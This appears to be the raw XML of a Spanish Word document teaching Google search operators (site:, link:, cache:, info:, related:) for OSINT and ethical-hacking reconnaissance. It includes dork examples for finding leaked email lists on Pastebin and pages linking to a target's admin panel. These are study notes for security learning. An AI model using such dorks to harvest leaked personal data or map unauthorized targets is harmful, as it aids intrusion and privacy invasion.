      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5BE740" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EF962B" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1683A89C" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D1D7E3" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39153470" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7117F2" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00FE172F" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE2C311" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRPr="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>site:sitio/dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D6B4D2" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRPr="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> Filtra los resultados a las páginas de un dominio concreto. Ideal para investigar un objetivo específico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3C078" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRPr="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> site:pastebin.com "email list"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B8FD0" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> Busca dentro de Pastebin contenido que incluya la frase “email list”, posible indicio de fuga de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60245606" w14:textId="77777777" w:rsidR="006E224A" w:rsidRPr="006E224A" w:rsidRDefault="006E224A" w:rsidP="006E224A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E224A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>link:url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0515EB" w14:textId="77777777" w:rsidR="006E224A" w:rsidRPr="006E224A" w:rsidRDefault="006E224A" w:rsidP="006E224A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E224A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E224A">
        <w:t> Muestra qué páginas enlazan a la URL indicada (solo se reflejan enlaces de sitios con cierta relevancia para Google).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7726CE3B" w14:textId="77777777" w:rsidR="006E224A" w:rsidRPr="006E224A" w:rsidRDefault="006E224A" w:rsidP="006E224A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E224A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E224A">
        <w:t> link:https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194705A3" w14:textId="121AF6DE" w:rsidR="006E224A" w:rsidRPr="00FE172F" w:rsidRDefault="006E224A" w:rsidP="006E224A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E224A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E224A">
        <w:t> Permite averiguar quién enlaza a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E224A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="006E224A">
        <w:t>, útil para investigación OSINT y reputacional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C3E33" w14:paraId="6B0C66C2" w14:textId="77777777" w:rsidTr="00E52968">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529A8C22" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>link:url - EXPLICACIÓN BREVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFED5C3" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="045B526A" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>link:https://ejemplo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E75654E" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve"> Muestra páginas que </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>enlazan/apuntan</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve"> a la URL especificada.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BC2F0A" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00B941CC" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="1DF23F1C">
                <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="266553F9" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplo práctico:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185339EC" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>link:https://facebook.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BE1CAA1" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Resultado:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve"> Google muestra sitios web que tienen un enlace hacia Facebook.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30276FA9" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>- blog.ejemplo.com menciona: "Síguenos en [Facebook]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F372D2" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>- noticias.com dice: "Según un estudio de [Facebook]..."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D88C69E" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>- empresa.com tiene: "Comparte en [Facebook]"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63387DA1" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00B941CC" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="716BD9BB">
                <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="0938685A" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5407F686" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1. Descubrir relaciones entre sitios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50894480" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>link:https://empresa-objetivo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D15C9D4" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>Encuentras qué sitios mencionan a la empresa → posibles partners, clientes, proveedores.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EC9001" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2. Encontrar subdominios o sitios relacionados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="195D1C81" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>link:https://admin.empresa.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241B45CD" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>Ver quién enlaza al panel admin (puede revelar documentación olvidada).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45518125" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3. Analizar reputación</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve"> Ver qué tipo de sitios enlazan al objetivo (foros, quejas, menciones en dark web indexada).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D440B5" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00B941CC" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="518CBC7D">
                <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C3388C" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Limitación importante:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735D0FB3" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve">Google ya </w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>no muestra todos los backlinks</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t>, solo una muestra limitada. Para análisis completo de backlinks, es mejor usar:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="543032BF" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>Ahrefs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5817B8CE" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>Moz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21199480" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>SEMrush</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D62A7EC" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>Majestic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CD0F620" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00B941CC" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="1F27F46F">
                <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="777F3151" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Diferencia clave:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6593EED4" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>link:ejemplo.com           → Quién enlaza A ejemplo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773E2556" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>site:ejemplo.com           → Qué hay DENTRO de ejemplo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262B4AC8" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:t>related:ejemplo.com        → Sitios similares a ejemplo.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E09BEB" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00B941CC" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="5AD904D0">
                <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="74CA6839" w14:textId="77777777" w:rsidR="00C10151" w:rsidRPr="00C10151" w:rsidRDefault="00C10151" w:rsidP="00C10151">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C10151">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>En resumen:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C10151">
              <w:t xml:space="preserve"> link: te muestra quién está hablando/enlazando a un sitio, útil para mapear relaciones y descubrir información contextual del objetivo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEA13F4" w14:textId="77777777" w:rsidR="00DC3E33" w:rsidRDefault="00DC3E33" w:rsidP="00B25916">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43FF36B6" w14:textId="77777777" w:rsidR="00E52968" w:rsidRPr="00E52968" w:rsidRDefault="00E52968" w:rsidP="00E52968">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E52968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cache:url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E2B21E" w14:textId="77777777" w:rsidR="00E52968" w:rsidRPr="00E52968" w:rsidRDefault="00E52968" w:rsidP="00E52968">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52968">
        <w:t> Muestra la versión que Google tiene guardada en caché de la página indicada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D8061D" w14:textId="77777777" w:rsidR="00E52968" w:rsidRPr="00E52968" w:rsidRDefault="00E52968" w:rsidP="00E52968">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52968">
        <w:t> cache:https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F3884" w14:textId="77777777" w:rsidR="00E52968" w:rsidRPr="00E52968" w:rsidRDefault="00E52968" w:rsidP="00E52968">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52968">
        <w:t> Permite ver la última copia de </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52968">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52968">
        <w:t>, incluso si el contenido original ha cambiado o sido eliminado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62101809" w14:textId="0FD5F047" w:rsidR="004D381A" w:rsidRDefault="00E52968" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E52968">
        <w:t>cache: te permite ver versiones antiguas de páginas que pueden contener información que ya fue eliminada o modificada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458843E" w14:textId="77777777" w:rsidR="008B367D" w:rsidRPr="008B367D" w:rsidRDefault="008B367D" w:rsidP="008B367D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>info:url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D61E94" w14:textId="77777777" w:rsidR="008B367D" w:rsidRPr="008B367D" w:rsidRDefault="008B367D" w:rsidP="008B367D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008B367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B367D">
        <w:t> Ofrece información que Google tiene sobre la página o dominio especificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B600EB9" w14:textId="77777777" w:rsidR="008B367D" w:rsidRPr="008B367D" w:rsidRDefault="008B367D" w:rsidP="008B367D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008B367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B367D">
        <w:t> info:https://example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21ABD2" w14:textId="77777777" w:rsidR="008B367D" w:rsidRPr="008B367D" w:rsidRDefault="008B367D" w:rsidP="008B367D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008B367D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B367D">
        <w:t> Muestra datos relacionados con </w:t>
      </w:r>
      <w:r w:rsidRPr="008B367D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="008B367D">
        <w:t>, por ejemplo la versión en caché o páginas similares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D21B8F4" w14:textId="77777777" w:rsidR="006065ED" w:rsidRPr="006065ED" w:rsidRDefault="006065ED" w:rsidP="006065ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006065ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>related:url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C145A1" w14:textId="77777777" w:rsidR="006065ED" w:rsidRPr="006065ED" w:rsidRDefault="006065ED" w:rsidP="006065ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006065ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="006065ED">
        <w:t> Devuelve páginas que Google considera similares al sitio indicado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98F4EC" w14:textId="77777777" w:rsidR="006065ED" w:rsidRPr="006065ED" w:rsidRDefault="006065ED" w:rsidP="006065ED">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006065ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="006065ED">
        <w:t> related:https://example.com</w:t>
      </w:r>
    </w:p>
